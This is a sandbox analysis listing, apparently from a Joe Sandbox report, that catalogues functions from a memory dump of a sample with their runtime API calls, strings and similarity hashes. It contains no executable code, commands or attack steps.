                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: __cftoe
                                          • String ID:
                                          • API String ID: 4189289331-0
                                          • Opcode ID: 9c0176134a39f7e72c2ef82b324e95c86f67c2346a5eaface233f7923650a260
                                          • Instruction ID: 9023ea47e048a35bafa0d7d3a54abd3ba5fb1e822d0a93a3fd59a27545e7b8ac
                                          • Opcode Fuzzy Hash: 9c0176134a39f7e72c2ef82b324e95c86f67c2346a5eaface233f7923650a260
                                          • Instruction Fuzzy Hash: FD512C36900205BBDF249B68CD41FBE77B8EF4D370F24921AF959D6192EB34DD008A68
                                          APIs
                                          • Concurrency::location::_Assign.LIBCMT ref: 00A52A3C
                                          • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00A52A44
                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A52A6E
                                          • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00A52A77
                                          • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00A52AFA
                                          • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00A52B02
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                                          • String ID:
                                          • API String ID: 3929269971-0
                                          • Opcode ID: 2a1fd83b4622b1f2a684369d9eab10e1c55eb28707d3f4ee94834a67457f0eaf
                                          • Instruction ID: 57a8f8aface1d6fb031550e2afe2914d163a9e97d7a01b6e77c6c5e2182a18bd
                                          • Opcode Fuzzy Hash: 2a1fd83b4622b1f2a684369d9eab10e1c55eb28707d3f4ee94834a67457f0eaf
                                          • Instruction Fuzzy Hash: 1E414A35A00219ABCF09DF68C554BADB7B5FF89311F008159E916AB391CB34AE05CF80
                                          APIs
                                          • GetLastError.KERNEL32(?,?,00A5A25F,00A57DFA,00A843DF,00000008,00A84737,?,?,?,?,00A54F23,?,?,21472377), ref: 00A5A276
                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A5A284
                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A5A29D
                                          • SetLastError.KERNEL32(00000000,?,00A5A25F,00A57DFA,00A843DF,00000008,00A84737,?,?,?,?,00A54F23,?,?,21472377), ref: 00A5A2EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLastValue___vcrt_
                                          • String ID:
                                          • API String ID: 3852720340-0
                                          • Opcode ID: 98a1acee7f7a63e6ec80fe2cf6e14a551fe70085985acdc69b905f1171d1bdd6
                                          • Instruction ID: 92c13e558b69cf2730c769b56bf56f365622f21ff0c0de462600fd85a7bfa597
                                          • Opcode Fuzzy Hash: 98a1acee7f7a63e6ec80fe2cf6e14a551fe70085985acdc69b905f1171d1bdd6
                                          • Instruction Fuzzy Hash: B601D8363093116E9B24A7F46D46DEB6A6AFB217B2F210339F911410F1EFA24C855145
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A385FC
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A38606
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • messages.LIBCPMT ref: 00A38640
                                          • std::_Facet_Register.LIBCPMT ref: 00A38657
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A38677
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A38695
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                                          • String ID:
                                          • API String ID: 438560357-0
                                          • Opcode ID: 3367c76cf0cd4fb2abcacd3bf1ade723fcb9db94baa4b47d57cf102c846d7ea0
                                          • Instruction ID: 047599644720bac195e8ff47219d1a68d65d7993877d3b888e8736e5145f45b4
                                          • Opcode Fuzzy Hash: 3367c76cf0cd4fb2abcacd3bf1ade723fcb9db94baa4b47d57cf102c846d7ea0
                                          • Instruction Fuzzy Hash: AF11A0329002289BCF05EBA4DA56AEE7775BF84720F240519F4156B291CF789E01CB91
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A38556
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A38560
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • collate.LIBCPMT ref: 00A3859A
                                          • std::_Facet_Register.LIBCPMT ref: 00A385B1
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A385D1
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A385EF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                                          • String ID:
                                          • API String ID: 2363045490-0
                                          • Opcode ID: c1742ac4efc1e18a9d0e0ef492a5b8d3a03ac37c34c9f22554d1060e9e018dd3
                                          • Instruction ID: 500c606e324faf24af2f39afce3ed3237e1ba7133fcf6eb11774c6527da35f69
                                          • Opcode Fuzzy Hash: c1742ac4efc1e18a9d0e0ef492a5b8d3a03ac37c34c9f22554d1060e9e018dd3
                                          • Instruction Fuzzy Hash: 6111A331900228ABCF05EBA4CA42AEE7775BF98720F240419F8116B291CF789E01CB91
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A387EE
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A387F8
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • moneypunct.LIBCPMT ref: 00A38832
                                          • std::_Facet_Register.LIBCPMT ref: 00A38849
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A38869
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A38887
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                          • String ID:
                                          • API String ID: 113178234-0
                                          • Opcode ID: 27cf7ae4dadaf7bc6ab98326096fee3256aeb84276041155c2c74e4b9844004d
                                          • Instruction ID: 3a22b31dcaf6d3b250fd3ec11c6897937901f190fb6e42e3349b9dd32a37a450
                                          • Opcode Fuzzy Hash: 27cf7ae4dadaf7bc6ab98326096fee3256aeb84276041155c2c74e4b9844004d
                                          • Instruction Fuzzy Hash: 7F11A032D002289BCF05FBA8DA56AEE7775BF84760F640519F5117B291DF389E01C791
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A38894
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A3889E
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • moneypunct.LIBCPMT ref: 00A388D8
                                          • std::_Facet_Register.LIBCPMT ref: 00A388EF
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A3890F
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A3892D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                                          • String ID:
                                          • API String ID: 113178234-0
                                          • Opcode ID: 14301e83ef6b8afa58dfdd678aa84626f07113c2ac887301a0afb17b418ec2c1
                                          • Instruction ID: 7a259218a4c29888af75b2a54d3ffa64c9edcdef27fe570fddeaf42e6eff8ddd
                                          • Opcode Fuzzy Hash: 14301e83ef6b8afa58dfdd678aa84626f07113c2ac887301a0afb17b418ec2c1
                                          • Instruction Fuzzy Hash: CA11A371900228ABCF05EBA4C942BFEB774BF84714F240419F8116B291CF389A01CB91
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A2B0EA
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A2B0F4
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • collate.LIBCPMT ref: 00A2B12E
                                          • std::_Facet_Register.LIBCPMT ref: 00A2B145
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B165
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A2B183
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                                          • String ID:
                                          • API String ID: 2363045490-0
                                          • Opcode ID: c298b5fa4892c0e332d01ab853940d5f02e9a5f9f22f48354e474f013f5129fb
                                          • Instruction ID: bf7d7ad7b95961dbc12963aa7a34236b85b2f4dde7b807113dd302794956557b
                                          • Opcode Fuzzy Hash: c298b5fa4892c0e332d01ab853940d5f02e9a5f9f22f48354e474f013f5129fb
                                          • Instruction Fuzzy Hash: 8B11A3359101249BCF05EBA8D955AFE77B5BF84720F240519E5116B2A1CF349E41C7A1
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A2B044
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A2B04E
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • codecvt.LIBCPMT ref: 00A2B088
                                          • std::_Facet_Register.LIBCPMT ref: 00A2B09F
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B0BF
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A2B0DD
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
                                          • String ID:
                                          • API String ID: 2594415655-0
                                          • Opcode ID: e6ada88bee326dfb3d2f771625e50b2741d60bb97bb05e0877869dcbc034d58b
                                          • Instruction ID: 0c14cb6d64c0ebba2a72a142cc911239c545cf1fac902d77f05064ab01a93dcb
                                          • Opcode Fuzzy Hash: e6ada88bee326dfb3d2f771625e50b2741d60bb97bb05e0877869dcbc034d58b
                                          • Instruction Fuzzy Hash: 6E11A032D00228DBCF05EBA8DE42AEE77B5FF84720F240519E8116B291DF349E41C7A1
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A2B190
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A2B19A
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • collate.LIBCPMT ref: 00A2B1D4
                                          • std::_Facet_Register.LIBCPMT ref: 00A2B1EB
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B20B
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A2B229
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
                                          • String ID:
                                          • API String ID: 2363045490-0
                                          • Opcode ID: 5451b5b61b2411169f27c7389edbb4deed31cf07e45f070ad0a2abd8ce97538c
                                          • Instruction ID: 6499d371afddbf9e828cdafed582f42186acb575cf4cadb7fd9607004fa868bd
                                          • Opcode Fuzzy Hash: 5451b5b61b2411169f27c7389edbb4deed31cf07e45f070ad0a2abd8ce97538c
                                          • Instruction Fuzzy Hash: CD11C6319102249BCF05EBA8D951BFE77B4FF94720F240519E4116B291DF34AE41C7A1
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A2B2DC
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A2B2E6
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • messages.LIBCPMT ref: 00A2B320
                                          • std::_Facet_Register.LIBCPMT ref: 00A2B337
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B357
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A2B375
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                                          • String ID:
                                          • API String ID: 438560357-0
                                          • Opcode ID: 88d410efafbc9b8b55fecd13bea30ad0e97f6625473b23e7671b551477dba89c
                                          • Instruction ID: 29344c1ed732fb7da3bf28c20921f26be9489e0e48c942ea14fb01f48f4daeb9
                                          • Opcode Fuzzy Hash: 88d410efafbc9b8b55fecd13bea30ad0e97f6625473b23e7671b551477dba89c
                                          • Instruction Fuzzy Hash: 9C11C632D102249BCF05EBA8D945BFE7774BF84720F284519E4117B291CF349E05CBA1
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A2B236
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00A2B240
                                            • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
                                            • Part of subcall function 009B2B00: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2B39
                                          • ctype.LIBCPMT ref: 00A2B27A
                                          • std::_Facet_Register.LIBCPMT ref: 00A2B291
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00A2B2B1
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A2B2CF
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
                                          • String ID:
                                          • API String ID: 1394824916-0
                                          • Opcode ID: 7c750ba131f9431a00b0dcfbe02afff8da922b39944b6b2032777d7eadcf770c
                                          • Instruction ID: 5989565e3cdf8d2bfa1e77b77a228d4fc6301c33070f756472ed356ee6996948
                                          • Opcode Fuzzy Hash: 7c750ba131f9431a00b0dcfbe02afff8da922b39944b6b2032777d7eadcf770c
                                          • Instruction Fuzzy Hash: 0E11A331D00228DBCF05FBA8DA42BEE77B5AF84720F240519E8116B291CF749E41C7A1
                                          APIs
                                          • GetLastError.KERNEL32(000000FF,00000000,00A613F8,00000000,00000000,?,00A618DE,00000000,00000000,009EBDFF,?,000000FF), ref: 00A7437E
                                          • _free.LIBCMT ref: 00A743B1
                                          • _free.LIBCMT ref: 00A743D9
                                          • SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743E6
                                          • SetLastError.KERNEL32(00000000,00000000,009EBDFF,?,000000FF), ref: 00A743F2
                                          • _abort.LIBCMT ref: 00A743F8
                                          Similarity
                                          • API ID: ErrorLast$_free$_abort
                                          • String ID:
                                          • API String ID: 3160817290-0
                                          • Opcode ID: 3bb1cbd6cef25946b58d4f6afe185f6e37ac40a2f7e72ebefbacded874dcace2
                                          • Instruction ID: 843f5db9f5d3b5e784ec2273a3df6a369bb5cfceaf69b02f615bddc974223e0b
                                          • Opcode Fuzzy Hash: 3bb1cbd6cef25946b58d4f6afe185f6e37ac40a2f7e72ebefbacded874dcace2
                                          • Instruction Fuzzy Hash: 3AF0CD3B10454167DE22B3F57D09F1B157A9FCA7B1B21C116F41CDA292FF2489025121
                                          APIs
                                            • Part of subcall function 00A10CD0: ___std_type_info_name.LIBVCRUNTIME ref: 00A10D8E
                                            • Part of subcall function 00A10CD0: ___std_type_info_name.LIBVCRUNTIME ref: 00A10DF9
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A12A51
                                            • Part of subcall function 00A57BC4: ___unDName.LIBVCRUNTIME ref: 00A57BF0
                                          • ___std_type_info_name.LIBVCRUNTIME ref: 00A12AB7
                                          Strings
                                          Similarity
                                          • API ID: ___std_type_info_name$Name___un
                                          • String ID: Modulus$PublicExponent$ThisObject:
                                          • API String ID: 3683324773-1616987064
                                          • Opcode ID: 45354314888e9c05e5494d87dcb5eb4677f10dc71938335f2fe17d442adc82f1
                                          • Instruction ID: f2e16feef5c8ed4bb1d88877539228d251563d91dea8214e7f398a8241eb6066
                                          • Opcode Fuzzy Hash: 45354314888e9c05e5494d87dcb5eb4677f10dc71938335f2fe17d442adc82f1
                                          • Instruction Fuzzy Hash: 5F4116306083416EC7229F34CC12FABBBE5BF95344F044A58F48567392EB72E999C796
                                          APIs
                                          • std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 009EB06D
                                            • Part of subcall function 00A28B5B: __EH_prolog3.LIBCMT ref: 00A28B62
                                            • Part of subcall function 00A28B5B: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00A28B80
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009EB08D
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009EB0AE
                                          • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 009EB0BE
                                          Strings
                                          Similarity
                                          • API ID: Locimp::_std::locale::_$LocimpLockitstd::_$AddfacH_prolog3Locimp_Lockit::_Lockit::~_New_
                                          • String ID: w#G!
                                          • API String ID: 2312398356-519468572
                                          • Opcode ID: b19e71908fc6ce314b31cc7deb08d0cfc1ddf5328aca8ccecde0d7121d860123
                                          • Instruction ID: 7a1ed45f957d3be82ce3573bf9afaad5aa31b820a7181ba5719f4ed80b82013a
                                          • Opcode Fuzzy Hash: b19e71908fc6ce314b31cc7deb08d0cfc1ddf5328aca8ccecde0d7121d860123
                                          • Instruction Fuzzy Hash: 1521B1B1A01604AFC711EF69ED82BABB7A8FB55311F004176E81697241EB34ED1ACBD1
                                          APIs
                                            • Part of subcall function 00A3FCB0: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,21472377,w#G!,?,?,?,00000000,00000000,21472377,21472377), ref: 00A3FCF5
                                          • ReleaseSemaphore.KERNEL32(?,?,00000000,21472377,?,21472377,21472377,?,00A8BF00,000000FF,?,00A3FD89), ref: 00A400A0
                                          • ReleaseSemaphore.KERNEL32(?,?,00000000,?,00A3FD89), ref: 00A400C1
                                          • CloseHandle.KERNEL32(?,?,21472377,21472377), ref: 00A400F2
                                          • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A90140,000000FF), ref: 00A4012C
                                          Strings
                                          Similarity
                                          • API ID: ReleaseSemaphore$CloseEventHandleObjectSingleWait
                                          • String ID: w#G!
                                          • API String ID: 568734227-519468572
                                          • Opcode ID: 8de948737ddb2b5d12dea9e088dedc941cb3b6172fbecab036d928a579aa2565
                                          • Instruction ID: 9b2b5c408e28479e5371275b9cb2865ef7401608f6eb8e1d67972d8cca3f7761
                                          • Opcode Fuzzy Hash: 8de948737ddb2b5d12dea9e088dedc941cb3b6172fbecab036d928a579aa2565
                                          • Instruction Fuzzy Hash: 9D31CE35A40204AFDF20DF69C884F56B7B8EB84314F1445A9ED18DB296DB35DC01DBA0
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009E61FA
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 009E6242
                                          • __Getcvt.LIBCPMT ref: 009E624B
                                            • Part of subcall function 009B2A30: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 009B2A56
                                            • Part of subcall function 009B2A30: std::_Lockit::~_Lockit.LIBCPMT ref: 009B2AEA
                                          Strings
                                          Similarity
                                          • API ID: std::_$Locinfo::_Lockit$GetcvtLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                          • String ID: w#G!$w#G!
                                          • API String ID: 1677860746-1134387879
                                          • Opcode ID: 438bdf621c508683b9341db2566a969801afbc031ec7fa5ea12cb9f443af5e59
                                          • Instruction ID: f68d13db133cc133ab9fc3b56a7ad15f65b0584e17edf335d17ef4a5cc0aa8b9
                                          • Opcode Fuzzy Hash: 438bdf621c508683b9341db2566a969801afbc031ec7fa5ea12cb9f443af5e59
                                          • Instruction Fuzzy Hash: 7F315A71C04748DEDB10DFA8CA41BDEBBF4FF19700F10466AE455A7282EBB46644CB95
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: Getcvt$H_prolog3_
                                          • String ID: false$true
                                          • API String ID: 4085572910-2658103896
                                          • Opcode ID: 66b3adafdda52085bad1f04e3b7f9ea2606786f2ecda86aa2211e4a280596ef2
                                          • Instruction ID: 6c3329f3832c82a6788bc42d722ae2bf8d0354a0d5cef73571c663c80b3b3727
                                          • Opcode Fuzzy Hash: 66b3adafdda52085bad1f04e3b7f9ea2606786f2ecda86aa2211e4a280596ef2
                                          • Instruction Fuzzy Hash: CE119075E04741AFC724EFB8E441B9AB7F4AF09700F04892AE1A68B741EB70E5088B61
                                          APIs
                                          • EnterCriticalSection.KERNEL32(00AD87E8,?,?,00A148EF,00AD7168,00A91FF0,00000001), ref: 00A4075A
                                          • LeaveCriticalSection.KERNEL32(00AD87E8,?,00A148EF,00AD7168,00A91FF0,00000001), ref: 00A4078D
                                          • SetEvent.KERNEL32(00000000,00AD7168,00A91FF0,00000001), ref: 00A4081B
                                          • ResetEvent.KERNEL32 ref: 00A40827
                                          Strings
                                          Similarity
                                          • API ID: CriticalEventSection$EnterLeaveReset
                                          • String ID: w#G!
                                          • API String ID: 3553466030-519468572
                                          • Opcode ID: 379b39d66a5277a4552426732f6a2ef63333c366764374f4e3838eb097d2979a
                                          • Instruction ID: 8a09cf59e0b5d5c955452379fb19b16ff1aadbbf8ffbba06cbc0f8d1402c2999
                                          • Opcode Fuzzy Hash: 379b39d66a5277a4552426732f6a2ef63333c366764374f4e3838eb097d2979a
                                          • Instruction Fuzzy Hash: 0901283AA01620EFCF04DFA9ED58D9977B9EB49741755412BE90297320CF386D06EB80
                                          APIs
                                          • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00A4E224
                                          • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00A4E248
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A4E25B
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A4E269
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
